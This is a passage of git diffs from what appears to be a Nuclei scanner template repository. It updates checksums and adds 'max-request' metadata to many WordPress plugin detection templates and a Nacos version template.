-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
-http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
-http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
-http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
+http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb
+http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
+http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
+http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
+http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
+http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
+http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
-http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
-http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
-http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
-http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
-http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
-http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
-http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
-http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825
-http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
-http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
-http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
-http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
+http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
+http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
+http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
+http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
+http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
+http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
+http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
+http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
+http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad
+http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
+http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
+http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
http/technologies/wordpress-detect.yaml:fcd6c47e6ae72e3d87671b6cd0b892a0879adfec
http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -6445,7 +6445,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e
ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec
-templates-checksum.txt:a1d472f4c132a5810a054fa597b32475df6c6c6d
+templates-checksum.txt:8bfdd32b4006470cdc07cc40eb0b66d2c8a719e4
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f
From c0c989f0ddbed447b553ee1d80c00ef836c8c041 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sat, 24 Jun 2023 12:59:53 +0000
Subject: [PATCH 523/670] TemplateMan Update [Sat Jun 24 12:59:53 UTC 2023]
:robot:
---
http/technologies/nacos-version.yaml | 5 ++---
http/technologies/wordpress/plugins/ad-inserter.yaml | 1 +
http/technologies/wordpress/plugins/add-to-any.yaml | 1 +
http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 +
.../wordpress/plugins/advanced-custom-fields.yaml | 1 +
http/technologies/wordpress/plugins/akismet.yaml | 1 +
.../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 +
http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 +
.../wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
.../plugins/all-in-one-wp-security-and-firewall.yaml | 1 +
http/technologies/wordpress/plugins/amp.yaml | 1 +
http/technologies/wordpress/plugins/antispam-bee.yaml | 1 +
http/technologies/wordpress/plugins/astra-sites.yaml | 1 +
http/technologies/wordpress/plugins/astra-widgets.yaml | 1 +
http/technologies/wordpress/plugins/autoptimize.yaml | 1 +
http/technologies/wordpress/plugins/backwpup.yaml | 1 +
.../wordpress/plugins/better-search-replace.yaml | 1 +
http/technologies/wordpress/plugins/better-wp-security.yaml | 1 +
.../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 +
http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 +
http/technologies/wordpress/plugins/breeze.yaml | 1 +
http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 +
.../wordpress/plugins/child-theme-configurator.yaml | 1 +
http/technologies/wordpress/plugins/classic-editor.yaml | 1 +
http/technologies/wordpress/plugins/classic-widgets.yaml | 1 +
.../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 +
http/technologies/wordpress/plugins/cloudflare.yaml | 1 +
http/technologies/wordpress/plugins/cmb2.yaml | 1 +
http/technologies/wordpress/plugins/coblocks.yaml | 1 +
http/technologies/wordpress/plugins/code-snippets.yaml | 1 +
http/technologies/wordpress/plugins/coming-soon.yaml | 1 +
http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 +
.../wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
http/technologies/wordpress/plugins/contact-form-7.yaml | 1 +
http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 +
http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 +
http/technologies/wordpress/plugins/cookie-notice.yaml | 1 +
http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 +
.../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 +
http/technologies/wordpress/plugins/custom-css-js.yaml | 1 +
http/technologies/wordpress/plugins/custom-fonts.yaml | 1 +
http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 +
http/technologies/wordpress/plugins/disable-comments.yaml | 1 +
http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 +
http/technologies/wordpress/plugins/duplicate-page.yaml | 1 +
http/technologies/wordpress/plugins/duplicate-post.yaml | 1 +
http/technologies/wordpress/plugins/duplicator.yaml | 1 +
.../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 +
http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 +
http/technologies/wordpress/plugins/easy-google-fonts.yaml | 1 +
.../wordpress/plugins/easy-table-of-contents.yaml | 1 +
http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 +
http/technologies/wordpress/plugins/elementor.yaml | 1 +
http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 +
.../technologies/wordpress/plugins/enable-media-replace.yaml | 1 +
http/technologies/wordpress/plugins/envato-elements.yaml | 1 +
.../plugins/essential-addons-for-elementor-lite.yaml | 1 +
.../technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 +
.../wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 +
.../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 +
http/technologies/wordpress/plugins/flamingo.yaml | 1 +
http/technologies/wordpress/plugins/fluentform.yaml | 1 +
http/technologies/wordpress/plugins/font-awesome.yaml | 1 +
.../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 +
http/technologies/wordpress/plugins/formidable.yaml | 1 +
http/technologies/wordpress/plugins/forminator.yaml | 1 +
http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 +
.../wordpress/plugins/gdpr-cookie-compliance.yaml | 1 +
.../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 +
.../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 +
.../wordpress/plugins/google-listings-and-ads.yaml | 1 +
http/technologies/wordpress/plugins/google-site-kit.yaml | 1 +
.../wordpress/plugins/google-sitemap-generator.yaml | 1 +
http/technologies/wordpress/plugins/gtranslate.yaml | 1 +
http/technologies/wordpress/plugins/gutenberg.yaml | 1 +
.../wordpress/plugins/happy-elementor-addons.yaml | 1 +
.../wordpress/plugins/header-and-footer-scripts.yaml | 1 +
.../wordpress/plugins/header-footer-code-manager.yaml | 1 +
.../wordpress/plugins/header-footer-elementor.yaml | 1 +
http/technologies/wordpress/plugins/header-footer.yaml | 1 +
http/technologies/wordpress/plugins/health-check.yaml | 1 +
http/technologies/wordpress/plugins/hello-dolly.yaml | 1 +
http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 +
http/technologies/wordpress/plugins/imagify.yaml | 1 +
http/technologies/wordpress/plugins/imsanity.yaml | 1 +
.../wordpress/plugins/insert-headers-and-footers.yaml | 1 +
http/technologies/wordpress/plugins/instagram-feed.yaml | 1 +
.../wordpress/plugins/intuitive-custom-post-order.yaml | 1 +
http/technologies/wordpress/plugins/iwp-client.yaml | 1 +
http/technologies/wordpress/plugins/jetpack.yaml | 1 +
http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 +
http/technologies/wordpress/plugins/kirki.yaml | 1 +
http/technologies/wordpress/plugins/leadin.yaml | 1 +
.../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 +
.../technologies/wordpress/plugins/limit-login-attempts.yaml | 1 +
http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 +
http/technologies/wordpress/plugins/loco-translate.yaml | 1 +
http/technologies/wordpress/plugins/loginizer.yaml | 1 +
http/technologies/wordpress/plugins/loginpress.yaml | 1 +
.../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 +
http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 +
http/technologies/wordpress/plugins/mailpoet.yaml | 1 +
http/technologies/wordpress/plugins/maintenance.yaml | 1 +
http/technologies/wordpress/plugins/mainwp-child.yaml | 1 +
http/technologies/wordpress/plugins/malcare-security.yaml | 1 +
http/technologies/wordpress/plugins/megamenu.yaml | 1 +
http/technologies/wordpress/plugins/members.yaml | 1 +
http/technologies/wordpress/plugins/meta-box.yaml | 1 +
http/technologies/wordpress/plugins/ml-slider.yaml | 1 +
http/technologies/wordpress/plugins/newsletter.yaml | 1 +
.../wordpress/plugins/nextend-facebook-connect.yaml | 1 +
http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 +
http/technologies/wordpress/plugins/ninja-forms.yaml | 1 +
http/technologies/wordpress/plugins/ocean-extra.yaml | 1 +
.../wordpress/plugins/official-facebook-pixel.yaml | 1 +
.../wordpress/plugins/one-click-demo-import.yaml | 1 +
http/technologies/wordpress/plugins/optinmonster.yaml | 1 +
http/technologies/wordpress/plugins/otter-blocks.yaml | 1 +
http/technologies/wordpress/plugins/password-protected.yaml | 1 +
http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 +
http/technologies/wordpress/plugins/photo-gallery.yaml | 1 +
http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 +
http/technologies/wordpress/plugins/polylang.yaml | 1 +
http/technologies/wordpress/plugins/popup-builder.yaml | 1 +
http/technologies/wordpress/plugins/popup-maker.yaml | 1 +
http/technologies/wordpress/plugins/post-smtp.yaml | 1 +
http/technologies/wordpress/plugins/post-types-order.yaml | 1 +
.../wordpress/plugins/premium-addons-for-elementor.yaml | 1 +
http/technologies/wordpress/plugins/pretty-link.yaml | 1 +
.../wordpress/plugins/really-simple-captcha.yaml | 1 +
http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 +
http/technologies/wordpress/plugins/redirection.yaml | 1 +
http/technologies/wordpress/plugins/redux-framework.yaml | 1 +
.../wordpress/plugins/regenerate-thumbnails.yaml | 1 +
http/technologies/wordpress/plugins/safe-svg.yaml | 1 +
http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 +
http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 +
http/technologies/wordpress/plugins/sg-security.yaml | 1 +
http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 +
.../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 +
.../wordpress/plugins/simple-custom-post-order.yaml | 1 +
http/technologies/wordpress/plugins/siteguard.yaml | 1 +
http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 +
http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 +
http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 +
.../plugins/stops-core-theme-and-plugin-updates.yaml | 1 +
http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 +
http/technologies/wordpress/plugins/svg-support.yaml | 1 +
.../wordpress/plugins/table-of-contents-plus.yaml | 1 +
http/technologies/wordpress/plugins/tablepress.yaml | 1 +
.../technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 +
http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 +
http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 +
http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 +
.../wordpress/plugins/translatepress-multilingual.yaml | 1 +
.../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 +
.../wordpress/plugins/under-construction-page.yaml | 1 +
http/technologies/wordpress/plugins/updraftplus.yaml | 1 +
http/technologies/wordpress/plugins/use-any-font.yaml | 1 +
http/technologies/wordpress/plugins/user-role-editor.yaml | 1 +
.../wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 +
.../wordpress/plugins/webp-converter-for-media.yaml | 1 +
http/technologies/wordpress/plugins/webp-express.yaml | 1 +
.../wordpress/plugins/widget-importer-exporter.yaml | 1 +
.../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 +
.../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 +
.../wordpress/plugins/woo-variation-swatches.yaml | 1 +
.../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 +
.../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 +
.../technologies/wordpress/plugins/woocommerce-payments.yaml | 1 +
.../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 +
.../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 +
.../technologies/wordpress/plugins/woocommerce-services.yaml | 1 +
http/technologies/wordpress/plugins/woocommerce.yaml | 1 +
http/technologies/wordpress/plugins/wordfence.yaml | 1 +
http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 +
http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 +
http/technologies/wordpress/plugins/worker.yaml | 1 +
http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 +
http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 +
http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 +
http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 +
http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 +
http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 +
http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 +
http/technologies/wordpress/plugins/wp-optimize.yaml | 1 +
http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 +
http/technologies/wordpress/plugins/wp-reset.yaml | 1 +
http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 +
http/technologies/wordpress/plugins/wp-smushit.yaml | 1 +
http/technologies/wordpress/plugins/wp-statistics.yaml | 1 +
http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 +
http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 +
http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 +
http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 +
http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 +
http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 +
.../wordpress/plugins/wpvivid-backuprestore.yaml | 1 +
.../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 +
201 files changed, 202 insertions(+), 3 deletions(-)
diff --git a/http/technologies/nacos-version.yaml b/http/technologies/nacos-version.yaml
index 2cd2ef56f1..71866f9bfb 100644
--- a/http/technologies/nacos-version.yaml
+++ b/http/technologies/nacos-version.yaml
@@ -8,12 +8,11 @@ info:
Nacos was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0.0
cwe-id: CWE-200
metadata:
- max-request: 1
- verified: true
+ max-request: 2
shodan-query: title:"Nacos"
+ verified: true
tags: tech,detect,nacos
http:
diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ad-inserter/
metadata:
+ max-request: 1
plugin_namespace: ad-inserter
wpscan: https://wpscan.com/plugin/ad-inserter
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/add-to-any/
metadata:
+ max-request: 1
plugin_namespace: add-to-any
wpscan: https://wpscan.com/plugin/add-to-any
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/admin-menu-editor/
metadata:
+ max-request: 1
plugin_namespace: admin-menu-editor
wpscan: https://wpscan.com/plugin/admin-menu-editor
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/advanced-custom-fields/
metadata:
+ max-request: 1
plugin_namespace: advanced-custom-fields
wpscan: https://wpscan.com/plugin/advanced-custom-fields
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index 97f1d8c18f..06cfd4950b 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/akismet/
metadata:
+ max-request: 1
plugin_namespace: akismet
wpscan: https://wpscan.com/plugin/akismet
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/all-404-redirect-to-homepage/
metadata:
+ max-request: 1
plugin_namespace: all-404-redirect-to-homepage
wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-seo-pack/
metadata:
+ max-request: 1
plugin_namespace: all-in-one-seo-pack
wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-migration/
metadata:
+ max-request: 1
plugin_namespace: all-in-one-wp-migration
wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
metadata:
+ max-request: 1
plugin_namespace: all-in-one-wp-security-and-firewall
wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/amp/
metadata:
+ max-request: 1
plugin_namespace: amp
wpscan: https://wpscan.com/plugin/amp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/antispam-bee/
metadata:
